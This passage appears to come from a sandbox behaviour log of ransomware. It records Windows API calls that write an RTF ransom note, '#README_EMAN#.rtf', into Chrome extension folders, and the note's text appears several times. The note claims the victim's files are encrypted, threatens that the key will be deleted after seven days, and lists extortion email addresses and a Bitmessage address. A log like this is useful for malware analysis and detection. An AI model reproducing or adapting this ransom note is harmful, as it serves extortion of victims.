ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.558] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.558] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.559] CloseHandle (hObject=0x2c8) returned 1 [0278.559] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\#readme_eman#.rtf")) returned 0x20 [0278.559] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0278.559] GetLastError () returned 0x2 [0278.559] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.560] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 